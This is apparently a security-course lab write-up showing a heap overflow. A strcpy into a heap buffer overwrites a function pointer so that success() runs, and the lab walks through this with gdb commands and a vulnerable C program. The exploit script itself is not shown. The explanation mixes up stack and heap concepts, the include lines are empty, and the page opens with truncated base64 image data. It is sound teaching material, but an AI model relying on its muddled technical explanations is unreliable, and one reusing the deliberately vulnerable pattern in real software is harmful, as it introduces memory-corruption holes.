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) + +## Demonstration of Heap Overflow +How it works: The vulnerable point of this Lab is strcpy function which is a C function. We can refer the program.c given The strcpy() function is used to copy a string from one location to another. However, it is considered to be a potentially unsafe function because it does not perform +any bounds checking on the length to be copied on destination buffer, which can lead to buffer overflow vulnerabilities, as we can overflow the destination buffer to our required length to overwritte specific parts of stack. Other vulnerable functions include strncpy(); memset(); etc. Suppose now the destination buffer is 20 bytes, but we paste 30 bytes in it. As we know from the introduction of heap above, it will overwrite some blocks of heap such as framed pointer or even return address. So it will not return to the default place but rather return to the address we overwrite to. + +From the above example, the **Core goal** is to call the function ```success()```, but in the example there is no where that the function is called. To achieve this we can use the existing vulnearbilty and overwrite the buffer and return address with the address of function success such that the function doesn't exit to ```main()```, rather it will call the function ``` success()```. + +In real life application this attack can be used to return the program to system function [ to spawn a shell] and gain root access. + +### GDB Tutorial +GDB is a debugger to analyse the memory and perform code analysis of C programs. To understand more about GDB follow the link- https://www.sourceware.org/gdb/ + +```assembly +$ gdb +$ gdb understand_heap + +info procmap # To get the address of stacks and heap. +disassemble #To get the address the functions. +``` +Run the executable understand_heap to understand the memory layout and find the address of function in the code. + +### The Vulnerable Program +```C +/* program.c */ + +/* This program has a stack overflow vulnerability. */ +/* Our task is to exploit this vulnerability */ +#include +#include +#include +#include +#include + +struct data { + char name[64]; +}; + +struct fp { + int (*fp)(); +}; + +void success() +{ + printf("Congratulations to attack the lab\n"); +} + +void fail() +{ + printf("Goal Failed\n"); +} + +int main(int argc, char **argv) +{ + struct data *d; + struct fp *f; + + d = malloc(sizeof(struct data)); + f = malloc(sizeof(struct fp)); + f->fp = fail; + + printf("data is at %p, fp is at %p\n", d, f); + + strcpy(d->name, argv[1]); + + f->fp(); + +} + + +``` + +```bash +$gdb heapoverflow +(gdb) b 38 +(gdb) run AAAAAAAA +``` + +```bash +(gdb) info proc map +(gdb) x/2200x $(the address of heap()) +(gdb) info address success +``` + + +```bash +(gdb) q +(gdb) y +$vim sol1.py +$ ./heapoverflow $(python sol1.py) +``` +You make it! + +figure of the sign showing success. \ No newline at end of file